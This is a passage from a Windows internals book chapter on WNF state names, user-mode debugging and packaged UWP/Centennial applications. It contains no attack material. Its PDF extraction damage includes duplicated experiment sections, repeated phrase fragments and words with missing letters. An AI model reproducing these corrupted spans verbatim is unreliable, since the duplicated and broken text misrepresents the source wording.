Windows Software Quality Metrics (SQM)
WUA
6
Windows Update
WWAN
5
Wireless Wire Area Network (WWAN) Service
XBOX
116
XBOX Services
CHAPTER 8 System mechanisms
233
WNF state names and storage
WNF state names are represented as random-looking 64-bit identifiers such as 0xAC41491908517835 and
then defined to a friendly name using C preprocessor macros such as WNF_AUDC_CAPTURE_ACTIVE. In
reality, however, these numbers are used to encode a version number (1), a lifetime (persistent versus
temporary), a scope (process-instanced, container-instanced, user-instanced, session-instanced, or
machine-instanced), a permanent data flag, and, for well-known state names, a prefix identifying the
owner of the state name followed by a unique sequence number. Figure 8-41 below shows this format.
Owner Tag
Version
Permanent
Data
Data
Scope
Name
Lifetime
Sequence Number
32 bits
4 bits
1 bit
4 bits
2 bits
21 bits
FIGURE 8-41 Format of a WNF state name.
As mentioned earlier, state names can be well-known, which means that they are preprovisioned
for arbitrary out-of-order use. WNF achieves this by using the registry as a backing store, which will
encode the security descriptor, maximum data size, and type ID (if any) under the HKLM\SYSTEM\
CurrentControlSet\Control\Notifications registry key. For each state name, the information is stored
under a value matching the 64-bit encoded WNF state name identifier.
Additionally, WNF state names can also be registered as persistent, meaning that they will remain
registered for the duration of the system’s uptime, regardless of the registrar’s process lifetime. This
mimics permanent objects that were shown in the “Object Manager” section of this chapter, and
similarly, the SeCreatePermanentPrivilege privilege is required to register such state names. These
WNF state names also live in the registry, but under the HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\VolatileNotifications key, and take advantage of the registry’s volatile flag to simply
disappear once the machine is rebooted. You might be confused to see “volatile” registry keys being
used for “persistent” WNF data—keep in mind that, as we just indicated, the persistence here is within
a boot session (versus attached to process lifetime, which is what WNF calls temporary, and which
we’ll see later).
Furthermore, a WNF state name can be registered as permanent, which endows it with the abil-
ity to persist even across reboots. This is the type of “persistence” you may have been expecting
earlier. This is done by using yet another registry key, this time without the volatile flag set, pres-
ent at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications. Suffice it to say, the
SeCreatePermanentPrivilege is needed for this level of persistence as well. For these types of WNF
states, there is an additional registry key found below the hierarchy, called Data, which contains, for
each 64-bit encoded WNF state name identifier, the last change stamp, and the binary data. Note that
if the WNF state name was never written to on your machine, the latter information might be missing.
234
CHAPTER 8 System mechanisms
Experiment: View WNF state names and data in the registry
In this experiment, you use the Registry Editor to take a look at the well-known WNF names as
well as some examples of permanent and persistent names. By looking at the raw binary registry
data, you will be able to see the data and security descriptor information.
Open Registry Editor and navigate to the HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Control\Notifications key.
Take a look at the values you see, which should look like the screenshot below.
Double-click the value called 41950C3EA3BC0875 (WNF_SBS_UPDATE_AVAILABLE), which
opens the raw registry data binary editor.
Note how in the following figure, you can see the security descriptor (the highlighted binary
data, which includes the SID S-1-5-18), as well as the maximum data size (0 bytes).
Experiment: View WNF state names and data in the registry
In this experiment, you use the Registry Editor to take a look at the well-known WNF names as
well as some examples of permanent and persistent names. By looking at the raw binary registry
data, you will be able to see the data and security descriptor information.
Open Registry Editor and navigate to the HKEY_LOCAL_MACHINE\SYSTEM\
CurrentControlSet\Control\Notifications key.
Take a look at the values you see, which should look like the screenshot below.
Double-click the value called 41950C3EA3BC0875 (WNF_SBS_UPDATE_AVAILABLE), which
opens the raw registry data binary editor.
Note how in the following figure, you can see the security descriptor (the highlighted binary
data, which includes the SID S-1-5-18), as well as the maximum data size (0 bytes).
CHAPTER 8 System mechanisms
235
Be careful not to change any of the values you see because this could make your system inop-
erable or open it up to attack.
Finally, if you want to see some examples of permanent WNF state, use the Registry Editor to go
to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\
Data key, and look at the value 418B1D29A3BC0C75 (WNF_DSM_DSMAPPINSTALLED). An example
is shown in the following figure, in which you can see the last application that was installed on this
system (MicrosoftWindows.UndockedDevKit).
Finally, a completely arbitrary state name can be registered as a temporary name. Such names have
a few distinctions from what was shown so far. First, because their names are not known in advance,
they do require the consumers and producers to have some way of passing the identifier between
each other. Normally, whoever either attempts to consume the state data first or to produce state data
instead ends up internally creating and/or using the matching registry key to store the data. However,
with temporary WNF state names, this isn’t possible because the name is based on a monotonically
increasing sequence number.
Be careful not to change any of the values you see because this could make your system inop-
erable or open it up to attack.
Finally, if you want to see some examples of permanent WNF state, use the Registry Editor to go
to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\
Data key, and look at the value 418B1D29A3BC0C75 (WNF_DSM_DSMAPPINSTALLED). An example
is shown in the following figure, in which you can see the last application that was installed on this
system (MicrosoftWindows.UndockedDevKit).
236
CHAPTER 8 System mechanisms
Second, and related to this fact, no registry keys are used to encode temporary state names—they
are tied to the process that registered a given instance of a state name, and all the data is stored in
kernel pool only. These types of names, for example, are used to implement the per-process wake
channels described earlier. Other uses include power manager notifications, and direct service triggers
used by the SCM.
WNF publishing and subscription model
When publishers leverage WNF, they do so by following a standard pattern of registering the state
name (in the case of non-well-known state names) and publishing some data that they want to expose.
They can also choose not to publish any data but simply provide a 0-byte buffer, which serves as a way
to “light up” the state and signals the subscribers anyway, even though no data was stored.
Consumers, on the other hand, use WNF’s registration capabilities to associate a callback with a
given WNF state name. Whenever a change is published, this callback is activated, and, for kernel
mode, the caller is expected to call the appropriate WNF API to retrieve the data associated with the
state name. (The buffer size is provided, allowing the caller to allocate some pool, if needed, or perhaps
choose to use the stack.) For user mode, on the other hand, the underlying WNF notification mecha-
nism inside of Ntdll.dll takes care of allocating a heap-backed buffer and providing a pointer to this
data directly to the callback registered by the subscriber.
In both cases, the callback also provides the change stamp, which acts as a unique monotonic se-
quence number that can be used to detect missed published data (if a subscriber was inactive, for some
reason, and the publisher continued to produce changes). Additionally, a custom context can be associ-
ated with the callback, which is useful in C++ situations to tie the static function pointer to its class.
Note WNF provides an API for querying whether a given WNF state name has been reg-
istered yet (allowing a consumer to implement special logic if it detects the producer must
not yet be active), as well as an API for querying whether there are any subscriptions cur-
rently active for a given state name (allowing a publisher to implement special logic such as
perhaps delaying additional data publication, which would override the previous state data).
WNF manages what might be thousands of subscriptions by associating a data structure with each
kernel and/or user-mode subscription and tying all the subscriptions for a given WNF state name
together. This way, when a state name is published to, the list of subscriptions is parsed, and, for user
mode, a delivery payload is added to a linked list followed by the signaling of a per-process notification
event—this instructs the WNF delivery code in Ntdll.dll to call the API to consume the payload (and any
other additional delivery payloads that were added to the list in the meantime). For kernel mode, the
mechanism is simpler—the callback is synchronously executed in the context of the publisher.
Note that it’s also possible to subscribe to notifications in two modes: data-notification mode, and
meta-notification mode. The former does what one might expect—executing the callback when new
data has been associated with a WNF state name. The latter is more interesting because it sends noti-
fications when a new consumer has become active or inactive, as well as when a publisher has termi-
nated (in the case of a volatile state name, where such a concept exists).
CHAPTER 8 System mechanisms
237
Finally, it’s worth pointing out that user-mode subscriptions have an additional wrinkle: Because
Ntdll.dll manages the WNF notifications for the entire process, it’s possible for multiple components
(such as dynamic libraries/DLLs) to have requested their own callback for the same WNF state name
(but for different reasons and with different contexts). In this situation, the Ntdll.dll library needs to
associate registration contexts with each module, so that the per-process delivery payload can be
translated into the appropriate callback and only delivered if the requested delivery mode matches the
notification type of the subscriber.
Experiment: Using the WnfDump utility to dump WNF state names
In this experiment, you use one of the book tools (WnfDump) to register a WNF subscription to
the WNF_SHEL_DESKTOP_APPLICATION_STARTED state name and the WNF_AUDC_RENDER
state name.
Execute wnfdump on the command line with the following flags:
-i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
The tool displays information about the state name and reads its data, such as shown in the
following output:
C:\>wnfdump.exe -i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
WNF State Name | S | L | P | AC | N | CurSize | MaxSize
-------------------------------------------------------------------------------------------
WNF_SHEL_DESKTOP_APPLICATION_STARTED | S | W | N | RW | I | 28 | 512
65 00 3A 00 6E 00 6F 00-74 00 65 00 70 00 61 00 e.:.n.o.t.e.p.a.
64 00 2E 00 65 00 78 00-65 00 00 00 d...e.x.e...
Because this event is associated with Explorer (the shell) starting desktop applications, you will
see one of the last applications you double-clicked, used the Start menu or Run menu for, or, in
general, anything that the ShellExecute API was used on. The change stamp is also shown, which
will end up a counter of how many desktop applications have been started this way since booting
this instance of Windows (as this is a persistent, but not permanent, event).
Launch a new desktop application such as Paint by using the Start menu and try the wnfdump
command again. You should see the change stamp incremented and new binary data shown.
WNF event aggregation
Although WNF on its own provides a powerful way for clients and services to exchange state informa-
tion and be notified of each other’s statuses, there may be situations where a given client/subscriber is
interested in more than a single WNF state name.
For example, there may be a WNF state name that is published whenever the screen backlight
is off, another when the wireless card is powered off, and yet another when the user is no longer
physically present. A subscriber may want to be notified when all of these WNF state names have
Experiment: Using the WnfDump utility to dump WNF state names
In this experiment, you use one of the book tools (WnfDump) to register a WNF subscription to
the WNF_SHEL_DESKTOP_APPLICATION_STARTED state name and the WNF_AUDC_RENDER
state name.
Execute wnfdump on the command line with the following flags:
-i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
The tool displays information about the state name and reads its data, such as shown in the
following output:
C:\>wnfdump.exe -i WNF_SHEL_DESKTOP_APPLICATION_STARTED -v
WNF State Name | S | L | P | AC | N | CurSize | MaxSize
-------------------------------------------------------------------------------------------
WNF_SHEL_DESKTOP_APPLICATION_STARTED | S | W | N | RW | I | 28 | 512
65 00 3A 00 6E 00 6F 00-74 00 65 00 70 00 61 00 e.:.n.o.t.e.p.a.
64 00 2E 00 65 00 78 00-65 00 00 00 d...e.x.e...
Because this event is associated with Explorer (the shell) starting desktop applications, you will
see one of the last applications you double-clicked, used the Start menu or Run menu for, or, in
general, anything that the ShellExecute API was used on. The change stamp is also shown, which
will end up a counter of how many desktop applications have been started this way since booting
this instance of Windows (as this is a persistent, but not
persistent, but not
persistent
permanent, event).
permanent, event).
permanent
Launch a new desktop application such as Paint by using the Start menu and try the wnfdump
command again. You should see the change stamp incremented and new binary data shown.
238
CHAPTER 8 System mechanisms
been published—yet another may require a notification when either the first two or the latter
has been published.
Unfortunately, the WNF system calls and infrastructure provided by Ntdll.dll to user-mode cli-
ents (and equally, the API surface provided by the kernel) only operate on single WNF state names.
Therefore, the kinds of examples given would require manual handling through a state machine that
each subscriber would need to implement.
To facilitate this common requirement, a component exists both in user mode as well as in kernel
mode that handles the complexity of such a state machine and exposes a simple API: the Common
Event Aggregator (CEA) implemented in CEA.SYS for kernel-mode callers and EventAggregation.dll
for user-mode callers. These libraries export a set of APIs (such as EaCreateAggregatedEvent and
EaSignalAggregatedEvent), which allow an interrupt-type behavior (a start callback while a WNF state
is true, and a stop callback once the WNF state if false) as well as the combination of conditions with
operators such as AND, OR, and NOT.
Users of CEA include the USB Stack as well as the Windows Driver Foundation (WDF), which exposes
a framework callback for WNF state name changes. Further, the Power Delivery Coordinator (Pdc.sys)
uses CEA to build power state machines like the example at the beginning of this subsection. The
Unified Background Process Manager (UBPM) described in Chapter 9 also relies on CEA to implement
capabilities such as starting and stopping services based on low power and/or idle conditions.
Finally, WNF is also integral to a service called the System Event Broker (SEB), implemented in
SystemEventsBroker.dll and whose client library lives in SystemEventsBrokerClient.dll. The latter exports
APIs such as SebRegisterPrivateEvent, SebQueryEventData, and SebSignalEvent, which are then passed
through an RPC interface to the service. In user mode, SEB is a cornerstone of the Universal Windows
Platform (UWP) and the various APIs that interrogate system state, and services that trigger themselves
based on certain state changes that WNF exposes. Especially on OneCore-derived systems such as
Windows Phone and XBOX (which, as was shown earlier, make up more than a few hundred of the well-
known WNF state names), SEB is a central powerhouse of system notification capabilities, replacing
the legacy role that the Window Manager provided through messages such as WM_DEVICEARRIVAL,
WM_SESSIONENDCHANGE, WM_POWER, and others.
SEB pipes into the Broker Infrastructure (BI) used by UWP applications and allows applications, even
when running under an AppContainer, to access WNF events that map to systemwide state. In turn, for
WinRT applications, the Windows.ApplicationModel.Background namespace exposes a SystemTrigger
class, which implements IBackgroundTrigger, that pipes into the SEB’s RPC services and C++ API, for
certain well-known system events, which ultimately transforms to WNF_SEB_XXX event state names.
It serves as a perfect example of how something highly undocumented and internal, such as WNF, can
ultimately be at the heart of a high-level documented API for Modern UWP application development.
SEB is only one of the many brokers that UWP exposes, and at the end of the chapter, we cover back-
ground tasks and the Broker Infrastructure in full detail.
CHAPTER 8 System mechanisms
239
User-mode debugging
Support for user-mode debugging is split into three different modules. The first one is located in the
executive itself and has the prefix Dbgk, which stands for Debugging Framework. It provides the neces-
sary internal functions for registering and listening for debug events, managing the debug object, and
packaging the information for consumption by its user-mode counterpart. The user-mode component
that talks directly to Dbgk is located in the native system library, Ntdll.dll, under a set of APIs that begin
with the prefix DbgUi. These APIs are responsible for wrapping the underlying debug object implemen-
tation (which is opaque), and they allow all subsystem applications to use debugging by wrapping their
own APIs around the DbgUi implementation. Finally, the third component in user-mode debugging
belongs to the subsystem DLLs. It is the exposed, documented API (located in KernelBase.dll for the
Windows subsystem) that each subsystem supports for performing debugging of other applications.
Kernel support
The kernel supports user-mode debugging through an object mentioned earlier: the debug object. It
provides a series of system calls, most of which map directly to the Windows debugging API, typically
accessed through the DbgUi layer first. The debug object itself is a simple construct, composed of a
series of flags that determine state, an event to notify any waiters that debugger events are present,
a doubly linked list of debug events waiting to be processed, and a fast mutex used for locking the
object. This is all the information that the kernel requires for successfully receiving and sending debug-
ger events, and each debugged process has a debug port member in its executive process structure
pointing to this debug object.
Once a process has an associated debug port, the events described in Table 8-32 can cause a debug
event to be inserted into the list of events.
Apart from the causes mentioned in the table, there are a couple of special triggering cases outside
the regular scenarios that occur at the time a debugger object first becomes associated with a pro-
cess. The first create process and create thread messages will be manually sent when the debugger is
attached, first for the process itself and its main thread and followed by create thread messages for all
the other threads in the process. Finally, load dll events for the executable being debugged, starting
with Ntdll.dll and then all the current DLLs loaded in the debugged process will be sent. Similarly, if a
debugger is already attached, but a cloned process (fork) is created, the same events will also be sent
for the first thread in the clone (as instead of just Ntdll.dll, all other DLLs are also present in the cloned
address space).
There also exists a special flag that can be set on a thread, either during creation or dynamically,
called hide from debugger. When this flag is turned on, which results in the HideFromDebugger flag in
the TEB to be set, all operations done by the current thread, even if the debug port has a debug port,
will not result in a debugger message.
240
CHAPTER 8 System mechanisms
TABLE 8-32 Kernel-mode debugging events
Event dentifier
Meaning
riggered
DbgKmExceptionApi
An exception has occurred.
KiDispatchException during an exception that occurred in
user mode.
DbgKmCreateThreadApi
A new thread has been created.
Startup of a user-mode thread.
DbgKmCreateProcessApi
A new process has been created.
Startup of a user-mode thread that is the first thread in
the process, if the CreateReported flag is not already set
in EPROCESS.
DbgKmExitThreadApi
A thread has exited.
Death of a user-mode thread, if the ThreadInserted flag is
set in ETHREAD.
DbgKmExitProcessApi
A process has exited.
Death of a user-mode thread that was the last thread in
the process, if the ThreadInserted flag is set in ETHREAD.
DbgKmLoadDllApi
A DLL was loaded.
NtMapViewOfSection when the section is an image file
(could be an EXE as well), if the SuppressDebugMsg flag is
not set in the TEB.
DbgKmUnloadDllApi
A DLL was unloaded.
NtUnmapViewOfSection when the section is an image file
(could be an EXE as well), if the SuppressDebugMsg flag is
not set in the TEB.
DbgKmErrorReportApi
A user-mode exception must be
forwarded to WER.
This special case message is sent over ALPC, not the de-
bug object, if the DbgKmExceptionApi message returned
DBG_EXCEPTION_NOT_HANDLED, so that WER can now
take over exception processing.
Once a debugger object has been associated with a process, the process enters the deep freeze state
that is also used for UWP applications. As a reminder, this suspends all threads and prevents any new
remote thread creation. At this point, it is the debugger’s responsibility to start requesting that debug
events be sent through. Debuggers usually request that debug events be sent back to user mode by
performing a wait on the debug object. This call loops the list of debug events. As each request is re-
moved from the list, its contents are converted from the internal DBGK structure to the native structure
that the next layer up understands. As you’ll see, this structure is different from the Win32 structure as
well, and another layer of conversion has to occur. Even after all pending debug messages have been
processed by the debugger, the kernel does not automatically resume the process. It is the debugger’s
responsibility to call the ContinueDebugEvent function to resume execution.
Apart from some more complex handling of certain multithreading issues, the basic model for
the framework is a simple matter of producers—code in the kernel that generates the debug events
in the previous table—and consumers—the debugger waiting on these events and acknowledging
their receipt.
Native support
Although the basic protocol for user-mode debugging is quite simple, it’s not directly usable by
Windows applications—instead, it’s wrapped by the DbgUi functions in Ntdll.dll. This abstraction is
required to allow native applications, as well as different subsystems, to use these routines (because
code inside Ntdll.dll has no dependencies). The functions that this component provides are mostly
analogous to the Windows API functions and related system calls. Internally, the code also provides
the functionality required to create a debug object associated with the thread. The handle to a debug
CHAPTER 8 System mechanisms
241
object that is created is never exposed. It is saved instead in the thread environment block (TEB) of the
debugger thread that performs the attachment. (For more information on the TEB, see Chapter 4 of
Part 1.) This value is saved in the DbgSsReserved[1] field.
When a debugger attaches to a process, it expects the process to be broken into—that is, an int 3
(breakpoint) operation should have happened, generated by a thread injected into the process. If this
didn’t happen, the debugger would never actually be able to take control of the process and would
merely see debug events flying by. Ntdll.dll is responsible for creating and injecting that thread into the
target process. Note that this thread is created with a special flag, which the kernel sets on the TEB, which
results in the SkipThreadAttach flag to be set, avoiding DLL_THREAD_ATTACH notifications and TLS slot
usage, which could cause unwanted side effects each time a debugger would break into the process.
Finally, Ntdll.dll also provides APIs to convert the native structure for debug events into the struc-
ture that the Windows API understands. This is done by following the conversions in Table 8-33.
TABLE 8-33 Native to Win32 conversions
Native State Change
Win32 State Change
Details
DbgCreateThreadStateChange
CREATE_THREAD_DEBUG_EVENT
DbgCreateProcessStateChange
CREATE_PROCESS_DEBUG_EVENT
lpImageName is always NULL, and fUnicode is
always TRUE.
DbgExitThreadStateChange
EXIT_THREAD_DEBUG_EVENT
DbgExitProcessStateChange
EXIT_PROCESS_DEBUG_EVENT
DbgExceptionStateChange
DbgBreakpointStateChange
DbgSingleStepStateChange
OUTPUT_DEBUG_STRING_EVENT,
RIP_EVENT, or
EXCEPTION_DEBUG_EVENT
Determination is based on the Exception Code
(which can be DBG_PRINTEXCEPTION_C /
DBG_PRINTEXCEPTION_WIDE_C,
DBG_RIPEXCEPTION, or something else).
DbgLoadDllStateChange
LOAD_DLL_DEBUG_EVENT
fUnicode is always TRUE
DbgUnloadDllStateChange
UNLOAD_DLL_DEBUG_EVENT
EXPERIMENT: Viewing debugger objects
Although you’ve been using WinDbg to do kernel-mode debugging, you can also use it to de-
bug user-mode programs. Go ahead and try starting Notepad.exe with the debugger attached
using these steps:
1.
Run WinDbg, and then click File, Open Executable.
2.
Navigate to the \Windows\System32\ directory and choose Notepad.exe.
3.
You’re not going to do any debugging, so simply ignore whatever might come up.
You can type g in the command window to instruct WinDbg to continue executing
Notepad.
Now run Process Explorer and be sure the lower pane is enabled and configured to show
open handles. (Select View, Lower Pane View, and then Handles.) You also want to look at un-
named handles, so select View, Show Unnamed Handles And Mappings.
EXPERIMENT: Viewing debugger objects
Although you’ve been using WinDbg to do kernel-mode debugging, you can also use it to de-
bug user-mode programs. Go ahead and try starting Notepad.exe with the debugger attached
using these steps:
1.
Run WinDbg, and then click File, Open Executable.
2.
Navigate to the \Windows\System32\ directory and choose Notepad.exe.
3.
You’re not going to do any debugging, so simply ignore whatever might come up.
You can type g in the command window to instruct WinDbg to continue executing
Notepad.
Now run Process Explorer and be sure the lower pane is enabled and configured to show
open handles. (Select View, Lower Pane View, and then Handles.) You also want to look at un-
named handles, so select View, Show Unnamed Handles And Mappings.
242
CHAPTER 8 System mechanisms
Next, click the Windbg.exe (or EngHost.exe, if you’re using the WinDbg Preview) process
and look at its handle table. You should see an open, unnamed handle to a debug object. (You
can organize the table by Type to find this entry more readily.) You should see something like
the following:
You can try right-clicking the handle and closing it. Notepad should disappear, and the
following message should appear in WinDbg:
ERROR: WaitForEvent failed, NTSTATUS 0xC0000354
This usually indicates that the debuggee has been
killed out from underneath the debugger.
You can use .tlist to see if the debuggee still exists.
In fact, if you look at the description for the NTSTATUS code given, you will find the text: “An
attempt to do an operation on a debug port failed because the port is in the process of being
deleted,” which is exactly what you’ve done by closing the handle.
As you can see, the native DbgUi interface doesn’t do much work to support the framework except
for this abstraction. The most complicated task it does is the conversion between native and Win32
debugger structures. This involves several additional changes to the structures.
Windows subsystem support
The final component responsible for allowing debuggers such as Microsoft Visual Studio or WinDbg to
debug user-mode applications is in KernelBase.dll. It provides the documented Windows APIs. Apart
from this trivial conversion of one function name to another, there is one important management
job that this side of the debugging infrastructure is responsible for: managing the duplicated file and
thread handles.
Recall that each time a load DLL event is sent, a handle to the image file is duplicated by the kernel
and handed off in the event structure, as is the case with the handle to the process executable dur-
ing the create process event. During each wait call, KernelBase.dll checks whether this is an event that
Next, click the Windbg.exe (or EngHost.exe, if you’re using the WinDbg Preview) process
and look at its handle table. You should see an open, unnamed handle to a debug object. (You
can organize the table by Type to find this entry more readily.) You should see something like
the following:
You can try right-clicking the handle and closing it. Notepad should disappear, and the
following message should appear in WinDbg:
ERROR: WaitForEvent failed, NTSTATUS 0xC0000354
This usually indicates that the debuggee has been
killed out from underneath the debugger.
You can use .tlist to see if the debuggee still exists.
In fact, if you look at the description for the NTSTATUS code given, you will find the text: “An
NTSTATUS code given, you will find the text: “An
NTSTATUS
attempt to do an operation on a debug port failed because the port is in the process of being
deleted,” which is exactly what you’ve done by closing the handle.
CHAPTER 8 System mechanisms
243
results in a new duplicated process and/or thread handles from the kernel (the two create events). If so,
it allocates a structure in which it stores the process ID, thread ID, and the thread and/or process handle
associated with the event. This structure is linked into the first DbgSsReserved array index in the TEB,
where we mentioned the debug object handle is stored. Likewise, KernelBase.dll also checks for exit
events. When it detects such an event, it “marks” the handles in the data structure.
Once the debugger is finished using the handles and performs the continue call, KernelBase.dll
parses these structures, looks for any handles whose threads have exited, and closes the handles for
the debugger. Otherwise, those threads and processes would never exit because there would always be
open handles to them if the debugger were running.
Packaged applications
Starting with Windows 8, there was a need for some APIs that run on different kind of devices, from a
mobile phone, up to an Xbox and to a fully-fledged personal computer. Windows was indeed starting
to be designed even for new device types, which use different platforms and CPU architectures (ARM
is a good example). A new platform-agnostic application architecture, Windows Runtime (also known
as “WinRT”) was first introduced in Windows 8. WinRT supported development in C++, JavaScript, and
managed languages (C#, VB.Net, and so on), was based on COM, and supported natively both x86,
AMD64, and ARM processors. Universal Windows Platform (UWP) is the evolution of WinRT. It has
been designed to overcome some limitations of WinRT and it is built on the top of it. UWP applications
no longer need to indicate which OS version has been developed for in their manifest, but instead they
target one or more device families.
UWP provides Universal Device Family APIs, which are guaranteed to be present in all device fami-
lies, and Extension APIs, which are device specific. A developer can target one device type, adding the
extension SDK in its manifest; furthermore, she can conditionally test the presence of an API at runtime
and adapt the app’s behavior accordingly. In this way, a UWP app running on a smartphone may start
behaving the way it would if it were running on a PC when the phone is connected to a desktop com-
puter or a suitable docking station.
UWP provides multiple services to its apps:
I
Adaptive controls and input—the graphical elements respond to the size and DPI of the screen
by adjusting their layout and scale. Furthermore, the input handling is abstracted to the under-
lying app. This means that a UWP app works well on different screens and with different kinds
of input devices, like touch, a pen, a mouse, keyboard, or an Xbox controller
I
One centralized store for every UWP app, which provides a seamless install, uninstall, and
upgrade experience
I
A unified design system, called Fluent (integrated in Visual Studio)
I
A sandbox environment, which is called AppContainer
244
CHAPTER 8 System mechanisms
AppContainers were originally designed for WinRT and are still used for UWP applications. We
already covered the security aspects of AppContainers in Chapter 7 of Part 1.
To properly execute and manage UWP applications, a new application model has been built in
Windows, which is internally called AppModel and stands for “Modern Application Model.” The
Modern Application Model has evolved and has been changed multiple times during each release of
the OS. In this book, we analyze the Windows 10 Modern Application Model. Multiple components are
part of the new model and cooperate to correctly manage the states of the packaged application and
its background activities in an energy-efficient manner.
I
ost Activit anager A The Host activity manager is a new component, introduced
in Windows 10, which replaces and integrates many of the old components that control the
life (and the states) of a UWP application (Process Lifetime Manager, Foreground Manager,
Resource Policy, and Resource Manager). The Host Activity Manager lives in the Background
Task Infrastructure service (BrokerInfrastructure), not to be confused with the Background
Broker Infrastructure component, and works deeply tied to the Process State Manager. It is
implemented in two different libraries, which represent the client (Rmclient.dll) and server
(PsmServiceExtHost.dll) interface.
I
Process State Manager (PSM) PSM has been partly replaced by HAM and is considered
part of the latter (actually PSM became a HAM client). It maintains and stores the state of
each host of the packaged application. It is implemented in the same service of the HAM
(BrokerInfrastructure), but in a different DLL: Psmsrv.dll.
I
Application Activation Manager (AAM) AAM is the component responsible in the dif-
ferent kinds and types of activation of a packaged application. It is implemented in the
ActivationManager.dll library, which lives in the User Manager service. Application Activation
Manager is a HAM client.
I
View Manager (VM) VM detects and manages UWP user interface events and activities
and talks with HAM to keep the UI application in the foreground and in a nonsuspended state.
Furthermore, VM helps HAM in detecting when a UWP application goes into background
state. View Manager is implemented in the CoreUiComponents.dll .Net managed library, which
depends on the Modern Execution Manager client interface (ExecModelClient.dll) to properly
register with HAM. Both libraries live in the User Manager service, which runs in a Sihost process
(the service needs to proper manage UI events)
I
Background Broker Infrastructure (BI) BI manages the applications background tasks, their
execution policies, and events. The core server is implemented mainly in the bisrv.dll library,
manages the events that the brokers generate, and evaluates the policies used to decide whether
to run a background task. The Background Broker Infrastructure lives in the BrokerInfrastructure
service and, at the time of this writing, is not used for Centennial applications.
There are some other minor components that compose the new application model that we have not
mentioned here and are beyond the scope of this book.
CHAPTER 8 System mechanisms
245
With the goal of being able to run even standard Win32 applications on secure devices like
Windows 10 S, and to enable the conversion of old application to the new model, Microsoft has de-
signed the Desktop Bridge (internally called Centennial). The bridge is available to developers through
Visual Studio or the Desktop App Converter. Running a Win32 application in an AppContainer, even if
possible, is not recommended, simply because the standard Win32 applications are designed to access
a wider system API surface, which is much reduced in AppContainers.
UWP applications
We already covered an introduction of UWP applications and described the security environment in
which they run in Chapter 7 of Part 1. To better understand the concepts expressed in this chapter, it is
useful to define some basic properties of the modern UWP applications. Windows 8 introduced signifi-
cant new properties for processes:
I
Package identity
I
Application identity
I
AppContainer
I
Modern UI
We have already extensively analyzed the AppContainer (see Chapter 7 in Part 1). When the user
downloads a modern UWP application, the application usually came encapsulated in an AppX package.
A package can contain different applications that are published by the same author and are linked to-
gether. A package identity is a logical construct that uniquely defines a package. It is composed of five
parts: name, version, architecture, resource id, and publisher. The package identity can be represented
in two ways: by using a Package Full Name (formerly known as Package Moniker), which is a string
composed of all the single parts of the package identity, concatenated by an underscore character; or
by using a Package Family name, which is another string containing the package name and publisher.
The publisher is represented in both cases by using a Base32-encoded string of the full publisher name.
In the UWP world, the terms “Package ID” and “Package full name” are equivalent. For example, the
Adobe Photoshop package is distributed with the following full name:
AdobeSystemsIncorporated.AdobePhotoshopExpress_2.6.235.0_neutral_split.scale-125_
ynb6jyjzte8ga, where
I
AdobeSystemsIncorporated.AdobePhotoshopExpress is the name of the package.
I
2.6.235.0 is the version.
I
neutral is the targeting architecture.
I
split_scale is the resource id.
I
ynb6jyjzte8ga is the base32 encoding (Crockford’s variant, which excludes the letters i, l, u, and
o to avoid confusion with digits) of the publisher.
246
CHAPTER 8 System mechanisms
Its package family name is the simpler “AdobeSystemsIncorporated.AdobePhotoshopExpress
_ynb6jyjzte8ga” string.
Every application that composes the package is represented by an application identity. An applica-
tion identity uniquely identifies the collection of windows, processes, shortcuts, icons, and functionality
that form a single user-facing program, regardless of its actual implementation (so this means that in
the UWP world, a single application can be composed of different processes that are still part of the
same application identity). The application identity is represented by a simple string (in the UWP world,
called Package Relative Application ID, often abbreviated as PRAID). The latter is always combined with
the package family name to compose the Application User Model ID (often abbreviated as AUMID). For
example, the Windows modern Start menu application has the following AUMID: Microsoft.Windows.
ShellExperienceHost_cw5n1h2txyewy!App, where the App part is the PRAID.
Both the package full name and the application identity are located in the WIN://SYSAPPID Security
attribute of the token that describes the modern application security context. For an extensive descrip-
tion of the security environment in which the UWP applications run, refer to Chapter 7 in Part 1.
Centennial applications
Starting from Windows 10, the new application model became compatible with standard Win32 applica-
tions. The only procedure that the developer needs to do is to run the application installer program with
a special Microsoft tool called Desktop App Converter. The Desktop App Converter launches the installer
under a sandboxed server Silo (internally called Argon Container) and intercepts all the file system and
registry I/O that is needed to create the application package, storing all its files in VFS (virtualized file
system) private folders. Entirely describing the Desktop App Converter application is outside the scope of
this book. You can find more details of Windows Containers and Silos in Chapter 3 of Part 1.
The Centennial runtime, unlike UWP applications, does not create a sandbox where Centennial
processes are run, but only applies a thin virtualization layer on the top of them. As result, compared
to standard Win32 programs, Centennial applications don’t have lower security capabilities, nor do
they run with a lower integrity-level token. A Centennial application can even be launched under
an administrative account. This kind of application runs in application silos (internally called Helium
Container), which, with the goal of providing State separation while maintaining compatibility, provides
two forms of “jails”: Registry Redirection and Virtual File System (VFS). Figure 8-42 shows an example of
a Centennial application: Kali Linux.
At package activation, the system applies registry redirection to the application and merges the
main system hives with the Centennial Application registry hives. Each Centennial application can
include three different registry hives when installed in the user workstation: registry.dat, user.dat,
and (optionally) userclasses.dat. The registry files generated by the Desktop Convert represent “im-
mutable” hives, which are written at installation time and should not change. At application startup,
the Centennial runtime merges the immutable hives with the real system registry hives (actually, the
Centennial runtime executes a “detokenizing” procedure because each value stored in the hive con-
tains relative values).
CHAPTER 8 System mechanisms
247
FIGURE 8-42 Kali Linux distributed on the Windows Store is a typical example of Centennial application.
The registry merging and virtualization services are provided by the Virtual Registry Namespace
Filter driver (WscVReg), which is integrated in the NT kernel (Configuration Manager). At package
activation time, the user mode AppInfo service communicates with the VRegDriver device with the
goal of merging and redirecting the registry activity of the Centennial applications. In this model, if the
app tries to read a registry value that is present in the virtualized hives, the I/O is actually redirected to
the package hives. A write operation to this kind of value is not permitted. If the value does not already
exist in the virtualized hive, it is created in the real hive without any kind of redirection at all. A different
kind of redirection is instead applied to the entire HKEY_CURRENT_USER root key. In this key, each new
